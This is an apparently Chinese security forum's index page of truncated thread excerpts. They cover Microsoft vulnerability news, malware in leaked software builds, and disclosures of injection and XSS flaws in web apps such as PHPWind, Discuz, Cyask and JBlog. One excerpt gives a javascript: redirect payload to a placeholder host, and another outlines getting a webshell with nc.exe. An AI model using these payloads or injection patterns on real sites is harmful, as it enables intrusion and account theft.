电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

笔记本取代台式机已经是不争的事实。笔记本最重要的功能之一就是可以支持Wi-Fi无线上网，无论高端的迅驰2还是低端的上网本都100%的内置了无线网卡。同时，无线路由器也不再高贵，便宜的只需要100多块钱，可以说无线上网的门槛已经大大降低。无线上网最大的优势就是没有网线的束缚，无论你在家里的哪个地方，都可以直接使用 ...

6月10日凌晨微软发布了有史以来严重漏洞补丁升级公告！我们先看看严重会对用户直接造成经济损失的漏洞情况： 严重-MS09-022：Windows 打印后台处理程序中的漏洞可能允许远程执行代码 (961501)。该漏洞最为恐怖，主要解决黑客利用服务器共享打印机执行远程控制。当服务器被黑客控制以后可通过局网或Internet快速广播病毒从而 ...

5.19断网事件后，对黑客的系列报道重新引发了人们对中国黑客的思考。应网易科技之邀，且和“道上”的朋友为多年深交，撰写“中国黑客史”一文，希望还原一个真实的中国黑客世界。 　　“黑客”一词来源于英语动词hack，意为“劈，砍”，也就意味着“辟出，开辟”;很自然 ...

微软警告广大用户，在从第三方网站下载泄露的Office 2010技术预览版时有可能会受到恶意代码攻击，这一情况和之前的Windows 7 RC版本泄露相似，两者都被恶意代码编写者利用并作为媒介传播恶意软件。微软Office产品经理Reed Shaffner表示，用户在下载安装泄露的Office 2010预览版副本时也许会有意料之外的“收获” ...

江民反病毒中心提醒电脑用户，微软于美国时间5月28日发布公告，称其操作系统存在一个DirectShow漏洞，该漏洞可能被黑客大肆利用，传播大量的木马病毒。 江民反病毒专家介绍，微软DirectShow漏洞在播放某些经过特殊构造的QuickTime媒体文件时，可能导致远程任意代码执行。 DirectShow是微软公司提供的一套在Windows平台上进 ...

微软全球正版Windows部门总经理乔·威廉斯(JoeWilliams)表示，客户从可靠来源获得Windows拷贝非常重要，“过去数天我们注意到，有媒体报道称出现了Windows7候选发布版非法拷贝，会在用户计算机上安装恶意件。” 　　微软周二发布了Windows 7候选发布版，在更大范围内对Windows 7进行测试。 　　微软一直宣 ...

事发一星期前,在入侵一个PHPWIND论坛时的成果,适用于PHPWIND不能上传,而网上盛传的三种拿SEHLL方法都无效,可以一试,应该算是PHPWIND后台的漏洞 准备工具:winsock专家 v0.6 betan1 一只;UE-32.EXE一只；NC.EXE一只,电脑一台(只见一堆砖头飞过。。。。) 开工了，首先打开winsock 然后启动IE，进入后台，（哪个又在丢砖头。。 ...

PHPWIND & DISCUZ! CSRF漏洞影响版本iscuz! 6.0.0 & 6.1.0 & 7.0.0 PHPWIND 6.0 & 6.3 & 7.0漏洞描述HPWIND & DISCUZ!存在CSRF漏洞，引发PHPWIND & DISCUZ! CSRF WORM!http://groups.google.com/group/p ... d/b31e4d2e6270c384#<*参考 http://groups.google.com/group/p ... d/b31e4d2e6270c384# *>安全建议ISCUZ删除templ ...

这个是最新有人发现的 该漏洞文件：ask/search_ajax.php 漏洞说明： /ask/search_ajax.php Code: if($q) { $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where } else { exit('null'); } $infos = $ask->listinfo($where, 'askid DESC', '', 10); /ask/include/answer.class.php Code: function lis ...

From:http://t00ls.net/viewthread.php?tid=1323&highlight= 校内网在发blog时对插入图片过滤不严格，存在xss漏洞. 在发blog时将插入图片URL写为如下代码即可触发：普通浏览复制代码打印代码 javascript:window.location.href='http://www.xxx.com/test.<SPAN class=t_tag xxxxx=tagshow(event) href="tag.php?name=php">ph ...

近日，安全专家对使用微软Internet信息服务IIS 6的管理员发出警告，声称Web服务器很容易受到攻击并暴露出密码保护的文件和文件夹。 　　据悉，基于WebDAV协议的部分进程命令中存在这种漏洞。通过给Web地址添加一些Unicode字符，黑客就可以访问这些敏感文件——这些文件一般都有系统密码保护。另外，该漏洞也可以 ...

严重程度：高威胁程度：控制远程主机错误类型：逻辑错误利用方式：主机模式  受影响系统Gh0st3.6之前所有版本 未影响系统 未知 详细描述Gh0st 发现漏洞一个逻辑漏洞，这些漏洞可以被用户利用，可以从被控端向控制端发送任意文件到任意位置。 测试代码1.控制端先向控制端发送TOKEN_DRIVE_LIST的封包。2.向控制端发送TOK ...

感谢：Iceboy发现此问题并提供DUMP漏洞厂商及产品：Microsoft Windows 7 rc 7100 090421存在漏洞组件：win32k.sys Timestamp :49ee8dc8存在漏洞函数:NtUserGetDc/NtUserGetDcEx 漏洞描述：Win32k.sys是WINDOWS的GDI驱动程序，包含大量复杂的图形界面处理，由于其中大量代码是从WIN3.1中修改过来，因此成了WINDOWS漏洞多发之 ...

影响版本:HoWave V4.1 ASP漏洞描述:在文件inc/ hl_manage.inc中： adminUserId= Request.Cookies("hl_manage")("username")   //第5行……sql_admin="select * from hl_admin where hl_adminuser='" & adminUserId & "'"   //第15行程序没有对从cookies获得的值过滤，导致注入漏洞的产生。 ...

影响版本: Cyask 程序介绍: Cyask国内较为多人使用的仿百度风格的Ask系统。 漏洞分析: 从Collect.php代码当中可以看到 else   {     /*   检查网址   */   $url=get_referer();     $neturl=emptyempty($_POST['neturl']) ? trim($_GET[' ...

影响版本JBlog 3.0.6.170程序介绍JBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术。漏洞分析:在文件Action.asp中：elseif request("action")="type1" then //第23行dim   mainurl,main,mainstrmainurl=request("mainurl")main=tr ...

影响版本JBlog 3.0.6.170程序介绍JBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术。漏洞分析:在文件class/cls_logAction.asp中：oldcate=request.form("oldcate") //第429行oldctype=request.form("oldtype")D = conn.execute("select cate ...

　相信有很多网友都在使用QQ空间，可以利用QQ空间来记录自己的心情。但有的时候自己的QQ空间并不想让其他人知道，那么就需要在QQ空间上设置权限或密码，只有有权限或知道密码的网友才能查看自己的QQ空间。 　　但现在要小心了，有一款名字为“风很凉QQ加密空间日志查看器”的软件，利用它无需权限，也不用知道对 ...

远程访问一直是个热门话题，人们需要能够随时随地通过任何设备登录网络获取信息。过去利用特定设备或者特定位置访问网络的时代已经过去了，特别是在企业内，人们希望在任何时候都能获取企业信息，可能使用笔记本、台式机、智能手机或者甚至MP3播放器来获取企业信息。　　微软公司就正在为此付出努力，希望能够保证用户随时 ...

对于一些大型网站来说，通常拥有一整套已经执行了的WEB站点安全防范解决方案，但是，为什么一些网站还是会被攻击者挂载木马?其中一个最主要的原因是已经实施的WEB站点安全解决方案只能够应对已经出现的安全漏洞和威胁。而攻击者总是在通过各种手段来分析网站中可能会存在的弱点或漏洞，以便能够成功绕过网站当前的安全防范 ...